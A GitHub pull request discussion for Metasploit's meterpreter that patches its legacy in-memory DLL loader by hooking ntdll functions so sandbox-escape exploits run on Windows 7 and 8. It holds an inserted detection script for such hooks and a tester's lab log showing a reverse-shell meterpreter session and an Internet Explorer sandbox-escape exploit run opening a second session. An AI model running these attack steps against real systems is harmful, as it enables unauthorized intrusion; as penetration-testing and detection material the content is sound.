This repository has been archived by the owner on Jan 22, 2024. It is now read-only.

Fix old win libloader to work under Win7 and Win8 #84

Merged
merged 2 commits into from
May 30, 2014

Conversation

jvazquez-r7
Contributor

This pull request tries to update the old windows meterpreter library loader to work under Win7 and Win8 when loading libraries from memory.

Actually meterpreter uses Reflective DLL Loader as its main loader on Windows. The reflective DLL loader avoids using LoadLibrary and the OS loader in order to be stealthy, which is awesome. But I found a particular situation where the old library loader was pretty useful. It was while porting some of the IE Sandbox bypasses from James Forshaw to metasploit:

rapid7/metasploit-framework#3402
rapid7/metasploit-framework#3403
rapid7/metasploit-framework#3404

In order to abuse these policy weaknesses you need the vulnerable process (IE Low Privilege) to load the exploit through LoadLibrary in order to apply the sandboxing. Otherwise policies don't apply and processes created from IE are always Low Privilege.

That said, this pull request just tries to fix the old meterpreter library loader to work under Windows 7 and Windows 8 when loading a library from memory, so we don't need to drop the exploit lib to disk. In order to do it:

  • Adds a hook for ntdll!NtClose to avoid crashing on Windows 7 (and newer versions I guess).
  • Modifies the ntdll!NtMapViewOfSection hook to modify the ViewSize parameter, otherwise further loading fails under Windows 7 and newer.

Verification steps
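Added example, not part of this pull request or of the meterpreter code base, written from the detection side. The loader above works by hooking ntdll!NtClose and ntdll!NtMapViewOfSection inside the process, and the standard defender check against that class of user-mode tampering is to compare the first bytes of each Nt* export as currently mapped in a process with the same bytes from the on-disk ntdll.dll and classify any difference by trampoline pattern. Everything here is constructed: the stub bytes, the syscall numbers, the `classify_prologue`/`scan`/`sample_report` names. Reading the real bytes (ReadProcessMemory plus export-table parsing) is left out, so the functions take pre-read byte strings.

```python
"""Classify inline hooks on x64 ntdll Nt* syscall stubs.

Added example (hypothetical helper names). Inputs are the first 16 bytes of
each export as seen in process memory and as found in the on-disk image.
"""
import struct
from dataclasses import dataclass

# x64 ntdll syscall stubs start with: mov r10, rcx ; mov eax, <syscall number>
STUB_PREFIX = b"\x4c\x8b\xd1\xb8"
PROLOGUE_LEN = 16


@dataclass
class Finding:
    export: str
    kind: str     # clean | jmp_rel32 | jmp_abs_mem | mov_rax_jmp | push_ret | modified | missing
    detail: str


def classify_prologue(name: str, mem: bytes, disk: bytes) -> Finding:
    """Compare in-memory prologue with on-disk prologue and name the trampoline, if any."""
    if mem == disk:
        return Finding(name, "clean", "prologue matches on-disk image")
    if mem[0] == 0xE9:                                  # jmp rel32
        rel = struct.unpack_from("<i", mem, 1)[0]
        return Finding(name, "jmp_rel32", f"relative jump, displacement {rel:#x}")
    if mem[:2] == b"\xff\x25":                          # jmp [rip+disp32]
        disp = struct.unpack_from("<i", mem, 2)[0]
        return Finding(name, "jmp_abs_mem", f"indirect jump via [rip{disp:+#x}]")
    if mem[:2] == b"\x48\xb8" and mem[10:12] == b"\xff\xe0":   # mov rax, imm64 ; jmp rax
        target = struct.unpack_from("<Q", mem, 2)[0]
        return Finding(name, "mov_rax_jmp", f"absolute jump to {target:#x}")
    if mem[0] == 0x68 and mem[5] == 0xC3:               # push imm32 ; ret
        target = struct.unpack_from("<I", mem, 1)[0]
        return Finding(name, "push_ret", f"push/ret to {target:#x}")
    return Finding(name, "modified", "prologue differs but matches no known trampoline")


def scan(memory_prologues: dict, disk_prologues: dict) -> list:
    """Walk every export known from disk and report its in-memory state."""
    findings = []
    for name in sorted(disk_prologues):
        mem = memory_prologues.get(name)
        if mem is None:
            findings.append(Finding(name, "missing", "export not read from process"))
            continue
        findings.append(classify_prologue(name, mem, disk_prologues[name]))
    return findings


def hooked(findings: list) -> list:
    """Only the entries a responder needs to look at."""
    return [f for f in findings if f.kind != "clean"]


# ---- constructed sample data (not real ntdll bytes or syscall numbers) ----
def _stub(ssn: int) -> bytes:
    # mov r10,rcx ; mov eax,ssn ; syscall ; ret ; int3 padding  (16 bytes)
    return STUB_PREFIX + struct.pack("<I", ssn) + b"\x0f\x05\xc3" + b"\xcc" * 5


DISK = {
    "NtClose": _stub(0x0F),
    "NtMapViewOfSection": _stub(0x28),
    "NtOpenFile": _stub(0x33),
    "NtCreateFile": _stub(0x55),
}

MEMORY = {
    # jmp rel32 patched over the first five bytes
    "NtClose": b"\xe9" + struct.pack("<i", 0x1234) + DISK["NtClose"][5:],
    # mov rax, imm64 ; jmp rax patched over the first twelve bytes
    "NtMapViewOfSection": b"\x48\xb8" + struct.pack("<Q", 0x7FF700001000)
                          + b"\xff\xe0" + DISK["NtMapViewOfSection"][12:],
    # untouched
    "NtOpenFile": DISK["NtOpenFile"],
    # push imm32 ; ret patched over the first six bytes
    "NtCreateFile": b"\x68" + struct.pack("<I", 0x401000) + b"\xc3" + DISK["NtCreateFile"][6:],
}


def sample_report() -> list:
    """Run the scan over the constructed sample and return the findings."""
    return scan(MEMORY, DISK)


if __name__ == "__main__":
    for f in hooked(sample_report()):
        print(f"{f.export:<22} {f.kind:<12} {f.detail}")
```

In real use the two dictionaries come from ReadProcessMemory on the target process and from the export table of the ntdll.dll file on disk; relocations do not touch the first bytes of these stubs, so a byte-for-byte comparison of the prologue is sound for this class of export.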

@metasploit-public-bot

Can one of the admins verify this patch? For more information see: https://github.com/rapid7/meterpreter/wiki/CI-Testing

@OJ
Contributor

OJ commented May 29, 2014

jenkins, add to whitelist

@OJ
Contributor

OJ commented May 29, 2014

Hey @jvazquez-r7, I'll take a look at this today once the kids have headed out to school!

@OJ OJ self-assigned this May 29, 2014
@kernelsmith

jenkins, make me a sandwich

On May 29, 2014, at 4:03 PM, OJ Reeves [email protected] wrote:

Hey @jvazquez-r7, I'll take a look at this today once the kids have headed out to school!


@metasploit-public-bot

Test PASSED.
Refer to this link for build results: https://ci.metasploit.com/job/GPR-MeterpreterWin/103/

@jvazquez-r7
Contributor Author

Thanks @OJ, btw, gimme a sec, noticed a bug at least... shame...

@OJ
Contributor

OJ commented May 29, 2014

OK mate, no worries!

f_NtMapViewOfSection p_NtMapViewOfSection;
f_NtClose p_NtClose;

Contributor

Very minor indenting issues here, because the existing source uses tabs instead of spaces.

Contributor Author

mmm I'm using tabs too :?

Contributor Author

damn it... Visual Studio... what are you doing with indentation?

Contributor Author

@OJ, should I do any configuration in Visual Studio to make it compatible with the current meterpreter indentation?

Contributor

That's a good question :P I left mine as the default (which I don't usually do, because I prefer spaces over tabs). So whatever is default should be fine.

Visual Studio is an epic troll ;)

Contributor Author

Otherwise I've fixed the bug I just spotted. Guidance about the full pull request is welcome =)

Contributor

Roger that! Scan of the code looks fine. Will test when the kids are out the door!

@metasploit-public-bot

Test PASSED.
Refer to this link for build results: https://ci.metasploit.com/job/GPR-MeterpreterWin/104/

@OJ
Contributor

OJ commented May 29, 2014

Tested rapid7/metasploit-framework#3403 on Windows 7:

msf exploit(handler) > exploit

[*] Started reverse handler on 10.1.10.40:8000
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.1.10.40
[*] Meterpreter session 1 opened (10.1.10.40:8000 -> 10.1.10.40:37326) at 2014-05-30 08:24:59 +1000

meterpreter > migrate 1556
[*] Migrating from 1756 to 1556...
[*] Migration completed successfully.
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploits/windows/local/ms13_097_ie_registry_symlink
msf exploit(ms13_097_ie_registry_symlink) > set session 1
session => 1
msf exploit(ms13_097_ie_registry_symlink) > set SRVHOST 10.1.10.40
SRVHOST => 10.1.10.40
msf exploit(ms13_097_ie_registry_symlink) > set SRVPORT 4444
SRVPORT => 4444
msf exploit(ms13_097_ie_registry_symlink) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms13_097_ie_registry_symlink) > set LHOST 10.1.10.40
LHOST => 10.1.10.40
msf exploit(ms13_097_ie_registry_symlink) > set LPORT 5555
LPORT => 5555
msf exploit(ms13_097_ie_registry_symlink) > rexploit
[*] Reloading module...

[*] Started reverse handler on 10.1.10.40:5555
[*] Running module against WIN-IV7GVO41GAT
[*] Using URL: http://10.1.10.40:4444/FLsCplXFiR
[*] Server started.
[*] Loading Exploit Library...
[*] 10.1.10.40       ms13_097_ie_registry_symlink - Sending window close html...
[*] 10.1.10.40       ms13_097_ie_registry_symlink - Sending window close html...
[*] 10.1.10.40       ms13_097_ie_registry_symlink - Sending hta...
[*] 10.1.10.40       ms13_097_ie_registry_symlink - Sending psh payload...
[*] Sending stage (770048 bytes) to 10.1.10.40
[*] Meterpreter session 2 opened (10.1.10.40:5555 -> 10.1.10.40:53582) at 2014-05-30 08:33:09 +1000
[*] Server stopped.

meterpreter > pwd
C:\Users\noob\Desktop
meterpreter > mkdir msf_pwned
Creating directory: msf_pwned
meterpreter > ls

Listing: C:\Users\noob\Desktop
==============================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40555/r-xr-xr-x   0      dir   2014-05-30 08:33:33 +1000  .
40777/rwxrwxrwx   0      dir   2014-05-30 08:21:09 +1000  ..
100666/rw-rw-rw-  282    fil   2014-05-30 08:21:09 +1000  desktop.ini
40777/rwxrwxrwx   0      dir   2014-05-30 08:33:33 +1000  msf_pwned

meterpreter >

@OJ
Contributor

OJ commented May 29, 2014

@jvazquez-r7 Which version of IE should this work on with Windows 8? And do I need any particular patch level for Windows 8?

@jvazquez-r7
Contributor Author

@OJ, you'll need an out of date installation without the MS patches in the modules' pull requests. IE10 and IE11 should work. Honestly, on Win8 I just tested the loader was working with a dummy DLL (shame...).

@OJ
Contributor

OJ commented May 29, 2014

I don't have an out of date installation of Windows 8 :( Will take me some time to get it set up. @Meatballs1 have you got a VM lying around?

@Meatballs1
Contributor

Any ideas why RDLL didn't work? The process should be sandboxed and the DLL is just loaded within the process? Is the IE User Broker thing not hooking CreateProcess (etc) from the DLL because of the way RDLL is loaded?

What about RDLL with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR defined?

@Meatballs1
Contributor

@OJ this PR can be verified with a simple HelloWorld dll? The patches only apply to the exploits but the ability to LoadLibrary isn't patched.

@OJ
Contributor

OJ commented May 29, 2014

@Meatballs1 yeah I was just hoping to see an end-to-end "real world" not just "hello world" scenario :)

@jvazquez-r7
Contributor Author

@Meatballs1 right about reflective DLL injection.

@OJ
Contributor

OJ commented May 30, 2014

This is looking fine to me.

@OJ OJ merged commit 934b3bb into rapid7:master May 30, 2014
OJ added a commit that referenced this pull request May 30, 2014
5 participants